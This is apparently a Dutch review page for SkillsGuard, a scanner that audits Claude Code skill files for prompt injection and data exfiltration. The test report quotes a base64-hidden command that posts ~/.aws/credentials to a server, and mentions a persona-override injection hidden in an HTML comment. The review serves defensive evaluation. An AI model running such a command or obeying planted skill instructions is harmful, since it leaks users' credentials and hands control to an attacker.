SkillsGuard

Statische scanner die een SKILL.md controleert op injectie, exfiltratie en escalatie

Door Teycir · Teycir/SkillsGuard

Werkt met setup ★ 6.8/10

SkillsGuard — Statische scanner die een SKILL.md controleert op injectie, exfiltratie en escalatie

Wat het doet

Stuurt de SkillsGuard statische scanner aan — 15 regelcategorieën die prompt injection, exfiltratie, command injection, persistentie, privilege escalation, obfuscation en supply chain omvatten — over een enkele skill of een hele skills folder, en formatteert vervolgens de bevindingen in een op ernst gegroepeerd oordeel met een installatie- / niet-installatie-aanbeveling. Het decodeert base64 en andere versluierde blobs vóór het matchen, zodat payloads die verborgen zijn in gecodeerde strings worden gerapporteerd met het gedecodeerde bewijs. Activeert op verzoeken zoals scan this skill, is this skill safe, of audit my skills folder.

Testrapport

De decode-first engine is echt: een skill geplaatst waarvan setup.sh `curl -X POST -d @<(cat ~/.aws/credentials)` verborg in een base64 blob, en de scanner decodeerde het en rapporteerde de credential exfiltration, de settings.json permission-widening regel en de persona-override injection begraven in een HTML comment — 17 bevindingen in 16 ms, alle drie de aanvallen gedetecteerd. Precisie is het probleem. Gericht op een echte bibliotheek van 278 geïnstalleerde skills, gaf het 15.480 bevindingen en scoorde de hele folder 100/100 CRITICAL, waarbij 204 van de 278 skills als HIGH-of-erger werden gemarkeerd; de twee meest luidruchtige regels matchen `rm` en `sh` zonder woordgrenzen, dus elke markdown inline code die 'format' of 'publish' bevat, wordt gerapporteerd als command injection. Een onschuldige 14-regelige notitie-skill waarvan de enige backtick `--format markdown` was, kwam terug als MEDIUM met vijf HIGH 'command injection' bevindingen. Het staat ook niet op npm — de SKILL.md alleen doet niets, en je moet klonen, npm install, build en npm link (of de MCP server aansluiten) voordat de skill iets heeft om aan te roepen. Nuttig als snelle pre-installatie triage op één verdachte skill; vertrouw niet op het folder-level oordeel.

Getest op: 2026-08-07 · Claude Code 2.x (agent harness)

Installatie

git clone https://github.com/Teycir/SkillsGuard.git
mkdir -p ~/.claude/skills
cp -r SkillsGuard/skill ~/.claude/skills/skillsguard
# scanner CLI is a separate build: cd SkillsGuard && npm install && npm run build && npm link

Commando's en voorbeeldprompts

  • /skillsguardStatische scanner die een SKILL.md controleert op injectie, exfiltratie en escalatie

Skills reageren op gewone verzoeken — geen commando's om te onthouden. Na installatie activeren prompts zoals deze de skill (in het Engels):

  • Can you scan this skill for prompt injection before I install it?
  • Is this Claude Code skill safe to install, any red flags?
  • Audit my whole ~/.claude/skills folder for exfiltration risks